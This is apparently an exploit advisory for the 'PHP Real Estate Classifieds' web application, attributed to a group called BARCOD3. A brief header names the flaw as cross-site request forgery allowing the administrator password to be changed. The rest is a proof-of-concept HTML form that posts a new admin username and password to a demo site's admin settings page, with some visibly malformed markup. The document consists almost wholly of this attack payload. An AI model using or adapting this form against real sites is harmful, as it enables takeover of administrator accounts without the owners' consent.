< ------------------- header data start ------------------- >


#############################################################

# Application Name : PHP Real Estate Classifieds

# Vulnerable Type : XSRF

# Infection : Administrator password Change Edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://phprealestatescript.com/premiumplus/admin/

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<h3>BARCOD3</h3>
<form action=http://phprealestatescript.com/premiumplus/admin/settings/index.php method=postid=settingsForm>
<input required=’yes’ value=username name=username type=text id=username >
<input required=’yes’ value=passWORD name=password type=password id=password >
<input name= onclick=validate(this.form); type=button value=update Settings>
</form>

< -- bug code end of -- >